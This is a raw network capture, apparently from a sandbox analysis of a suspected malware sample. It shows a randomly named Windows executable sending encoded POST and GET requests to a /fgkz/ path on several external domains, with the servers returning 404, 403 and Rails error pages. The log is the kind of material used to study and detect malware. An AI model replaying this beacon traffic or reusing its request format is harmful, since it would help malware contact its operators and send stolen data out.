                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                Aug 30, 2024 07:20:44.880357981 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:43 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                Aug 30, 2024 07:20:44.880553961 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:43 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                26 | 192.168.2.5 | 49744 | 122.10.12.59 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:45.718992949 CEST | 632 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.uty803.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.uty803.com
                                Referer: http://www.uty803.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=Xc2pHUoEkm+ObmYDm0d+SPVfHTrNljjV9Qu1NSBg0EFnS/tVmVMpcGHF8SSdoylrY3u6f2H0nu6V/0HAjyEASWDSt+bHmfMp1cZkWKqDq1PZUmpl9JksLUL9aNfoK98xTKTRi99faVb88Ba0U8RpxC4eOnMoqYZGE2e8RI7lu4R1DF72Cxvts38UftfcWYjDj1g33Zs=
                                Aug 30, 2024 07:20:46.596734047 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:46 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                27 | 192.168.2.5 | 49745 | 122.10.12.59 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:48.247308016 CEST | 1645 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.uty803.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.uty803.com
                                Referer: http://www.uty803.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8= [TRUNCATED]
                                Aug 30, 2024 07:20:49.127135038 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:48 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                28 | 192.168.2.5 | 49746 | 122.10.12.59 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:20:50.781810999 CEST | 344 | OUT | GET /fgkz/?4f2t8=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlSNGPfsMX8qY9T/A==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.uty803.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:20:51.661463976 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Fri, 30 Aug 2024 05:20:51 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                29 | 192.168.2.5 | 49747 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:05.411534071 CEST | 639 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nathanladd.software
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nathanladd.software
                                Referer: http://www.nathanladd.software/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=13qOoqWg3R0NFF1UMya3Ll61t3sTAIJ6C2HMiyQnVzzTfIFCIQLDsrSx/dtJABbwL/J7dVC/ww8382hilvDtUt2npjxL0ngWmUi0cPs977V/f9IURnfMMCL0jsyQBvolsjlQ6P2gfrhUBtG/o8uy1Vj1E/5amUSgAbVrWDcwczi1iqBy+g==
                                Aug 30, 2024 07:21:06.071223021 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                30 | 192.168.2.5 | 49748 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:07.944053888 CEST | 659 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nathanladd.software
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nathanladd.software
                                Referer: http://www.nathanladd.software/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=13qOoqWg3R0NfklUclO3MF66nXsTKoIzC27Mizk3VlLTYp1CJRLDrrSx09tMNhbrL/MOdXW/ww4380JilYvsU92hjzxJwngWmUi0cPRW77d/cJ0URDLPSyL118yQFvohsjl+6KvLfu9UBoC/oICx8VjsKf4urXL8G7N5eyFOJDHGqfth5S+VjRYHFkSxz9OE605SLfM=
                                Aug 30, 2024 07:21:08.582278013 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                31 | 192.168.2.5 | 49749 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:10.484987974 CEST | 1672 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nathanladd.software
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nathanladd.software
                                Referer: http://www.nathanladd.software/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=13qOoqWg3R0NfklUclO3MF66nXsTKoIzC27Mizk3VmrTYfhCIyjDqrSx9dtNNharL/0KdXbKwyw36Xxiyc7sf92hrTxI0nhemQGwcPhW77d/cIkUFHfPQyL0jsyMBvoFsj9I6OywfdlUAIS/7Nux+1juaP42rX3VG7R1ezxwJBHGuLoZ9Q2M1yEhKh2DyZGNnlgTRKUMsoPYchHDvqJ80b1N+SuTjQLZM6Jh9qv4L9xaJoMvCah9vVUE6E9+7Ka7xuR9JshWFXOtGLazOGXejObCYR9+9O8TV7M3i7x+02UlaRUXKtHmGOXPj0CnXwmLA26GsmK0f6GgOMsYuIyIaZTR0jwXqiyxYlLNfOSTn1p1spTEuXFxVROZCDaVTz5FEmGAwcClDOAf5HUHVr+S/ADNIwmHKgNJzoPAyD5GKq5F6w4VDKUVzvIqeFhtMsnVCiEYz98Bh3yUvEFElRPXHy9FD2xzXkZZryq2b8ygGv04h6mIqskPxN6In95T+pPW7hn/Rsc4Ljvpo2yY4dAIGVM+4cXuZog7jUgA/A1BHhnsg8jiWmuUpDjwzPawhgtMkC1+sJLEWakHMbURnd9OvaL/JhQQwjm4V5rodlX3G/QcuaQx7Ed0MPIuViB6TkdZ8x+ONBC5sT4t+E0CeeMLk2IkX6cXqytoDFI6K6z24LlJzrYlVoPEG+aZmmzFuUzt9aHYKNpPomZedLeICgHVdyzCh41QIDpWFrI39mEsvWJJpQwAFQDMc9U2CxIEmy1JNxTLREDxNaY0SCYN5nd1TRYiW4Oz64maxYPYhkSajlx5ZE4iNz5W9hXFydIcGDoMSKYPQGG4VhNSpJB3LlTVdAUpDnXrfs4ssL2R6PolvS5oi0exSjY1twbfDhFq3CoxufCiVJ2oEzqd8mbCl9U+P+4HX96bKhp0ze/wqRWkyZYpAl0cBQityTRLsXLRLrKIdYf/ww9sdItQ+CB274sVy21oFdPnmQEKkbmrKQzCmjV10q [TRUNCATED]
                                Aug 30, 2024 07:21:11.139312983 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                32 | 192.168.2.5 | 49750 | 91.195.240.19 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:13.015535116 CEST | 353 | OUT | GET /fgkz/?4f2t8=41Curen82hkwcHpyAWCbG1C0h00zKpR4XE7lig5tQUDuQ/w4IAvXl9Gm09xCLibXJ4gYU1q3vSZc7UEZudfqXPaUnSpi+WZhrQ==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.nathanladd.software
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:21:13.661000967 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                33 | 192.168.2.5 | 49751 | 216.40.34.41 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:27.623287916 CEST | 621 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.hugelmann.org
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.hugelmann.org
                                Referer: http://www.hugelmann.org/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=+pGgFuSV+iBrqGFIdksMNW7IQ5xHLMRNboep5PQ7bGUJT+32zKHMnyDqQH+Vc6/oRRnkFKGsaBhuWwYp5G9BMZNPSpweK+XG5WuOWSnE+A1Fgf/2DlqPxC+//ajpVncH2kjTWYTt0UPDaYfjYyIHd5dQH2mNMWNFK6kULlXLoamOSRzHUg==
                                Aug 30, 2024 07:21:28.140078068 CEST  1236  IN  HTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 78244037-ccc2-4297-85d4-ff9e3a2f927c
                                x-runtime: 0.036430
                                content-length: 16984
                                connection: close
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                Aug 30, 2024 07:21:28.140094995 CEST  1236  IN
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                Aug 30, 2024 07:21:28.140105963 CEST  448  IN
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                Aug 30, 2024 07:21:28.140111923 CEST  1236  IN
                                Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
                                Aug 30, 2024 07:21:28.140124083 CEST  1236  IN
                                Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Framework Trace</a> |
                                Aug 30, 2024 07:21:28.140132904 CEST  448  IN
                                Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
                                Aug 30, 2024 07:21:28.140139103 CEST  1236  IN
                                Data Ascii: 2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-
                                Aug 30, 2024 07:21:28.140142918 CEST  1236  IN
                                Data Ascii: (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/acti
                                Aug 30, 2024 07:21:28.140153885 CEST  1236  IN
                                Data Ascii: trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&
                                Aug 30, 2024 07:21:28.140171051 CEST  1236  IN
                                Data Ascii: trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceFrames = document.getElementsByClassName('trace-f
                                Aug 30, 2024 07:21:28.145030022 CEST  1236  IN
                                Data Ascii: <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead> <tr> <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>


                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                34  192.168.2.5  49752  216.40.34.41  80  5264  C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp  Bytes transferred  Direction  Data
                                Aug 30, 2024 07:21:30.153744936 CEST  641  OUT  POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.hugelmann.org
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.hugelmann.org
                                Referer: http://www.hugelmann.org/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=+pGgFuSV+iBrpjNIb3UML27HeZxHBsQEboSp5N92Y1gJTc/2yIvMkyDqIX+qSa/2RWvSFPmsaBluW0Up51FCKZN3OpwmFeXG5WuOWSzu+EhFgvP2AEqIyC+8oqjpG3cD2kjxWZfH0SDDacTjczIGT5dSLmn+B04pApkkcVvA7ZvKXEfUTQIUZ1ITjJRN7T+k3dfhaz8=
                                Aug 30, 2024 07:21:30.667834997 CEST  1236  IN  HTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 6cc8d1b1-c997-4ad8-b0ba-aee70f1a65fa
                                x-runtime: 0.029674
                                content-length: 17007
                                connection: close
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                Aug 30, 2024 07:21:30.667857885 CEST  1236  IN
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                Aug 30, 2024 07:21:30.667869091 CEST  448  IN
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                Aug 30, 2024 07:21:30.667881012 CEST  1236  IN
                                Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
                                Aug 30, 2024 07:21:30.667891979 CEST  1236  IN
                                Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Framework Trace</a> |
                                Aug 30, 2024 07:21:30.667901993 CEST  1236  IN
                                Data Ascii: /a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/reques
                                Aug 30, 2024 07:21:30.667915106 CEST  612  IN
                                Data Ascii: uration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9) lib/puma/server.rb:472:
                                Aug 30, 2024 07:21:30.668118954 CEST  1236  IN
                                Data Ascii: ><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions.rb:65:in `call&#39;</a><br><a class="trace-frames" data-frame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middlew
                                Aug 30, 2024 07:21:30.668128967 CEST  1236  IN
                                Data Ascii: 5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-id="10" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trac
                                Aug 30, 2024 07:21:30.668138981 CEST  1236  IN
                                Data Ascii: ext/javascript"> var traceFrames = document.getElementsByClassName('trace-frames'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames for (var i = 0; i <
                                Aug 30, 2024 07:21:30.672981977 CEST  1236  IN
                                Data Ascii: > <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>Controller#Action</th> </tr> <tr class='bottom'> <th> <a data-route-helper="_path" title="Returns a relative path (without the http or domain)


                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                35  192.168.2.5  49753  216.40.34.41  80  5264  C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp  Bytes transferred  Direction  Data
                                Aug 30, 2024 07:21:32.691554070 CEST  1654  OUT  POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.hugelmann.org
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.hugelmann.org
                                Referer: http://www.hugelmann.org/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=+pGgFuSV+iBrpjNIb3UML27HeZxHBsQEboSp5N92Y0YJTuH2zunMlyDqA3+RSa+qRXLOFP7ZaDtuWRIpykFCZ5N3WpwdK+WC5W+KWSju+EhFgsX2UFqI0C+//ajfVncr2k6MWZL90CjDa8DjaRwGb5dMImnmB0k2ApJbcUad7ebKUhqKHQAfHmoJwr8ep2eBtPzQAmSVf4sSqL9549Lb8BcjyqwX0e13Y5WviXfkFfgxF870i+q5ruktbWynQ4aHHv34/junrmU+xTc/HX3Nws/4mocomJ10LN3yZ12vljnWEqFwVdm6OjVZqDHDg6FULd4TCnxjbC9pQkBegylpY4jlnhoTDadwbREAwzm3oXHGb4fILT596G8lAlsT6TRvB30cGuA5OwOaFlk8enUm5r0Zh7M0ZaPTLQVKXFlUVPbkKQVZxw+HWMAZ2Q1EjXRjIpwKUtD6qWKEx530WYPGeYDQzJ+mdwD7+FvF8UBsSe5q6G8vFGoOX+GgROcWcm4TaHBbLEKmcWQ7xz0SN5TQkZKMfN3mxglsi7v5gq9fDg46gK1YSg1r9lGu9AHzBvTc/LY7UFzdqm7nA6ODrZUQ6eXvBoRRWzXRPgsw+bo2fYV0eOiOSppQLeoDtuUI6/iCAO/LR00sNwKJGdveFZNV7cq660m+5yMl878h8Ly2DP7dTnZ7B6O7dTZfNFRv1suiMmAPLpcCJt90UrKzgSEaR90DLGVs4+NXtZnVysY4nWFOqXIFWAy0kLWz2xq4F8nhd1A25DENwr8Q2a8wd2NET60U9RgmMdfBigBc0D2TcY/enoiaa8mMcI0yTx1bgRj3pBVEAYUXML9Yi7pgIZm0jUh533pLccitlVfIkiyPXnUqAGqG2fTwiJ/4V15X/5ENXLBQXxYhM5ZG9OVU3evymDU5dahvGeYvJqCZOuADSLOofXK+TfsHZNN33hsuRdLe/p1XYd2arokUFNH+Xbz4FjZBFT3HXJI589nM+nYptekNvi [TRUNCATED]
                                Aug 30, 2024 07:21:33.213637114 CEST  1236  IN  HTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 6423d2d3-1d81-406a-820f-58718bafdc34
                                x-runtime: 0.038536
                                content-length: 18019
                                connection: close
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                Aug 30, 2024 07:21:33.213727951 CEST  1236  IN
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                Aug 30, 2024 07:21:33.213763952 CEST  1236  IN
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                Aug 30, 2024 07:21:33.213794947 CEST  1236  IN
                                Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                Aug 30, 2024 07:21:33.213829041 CEST  896  IN
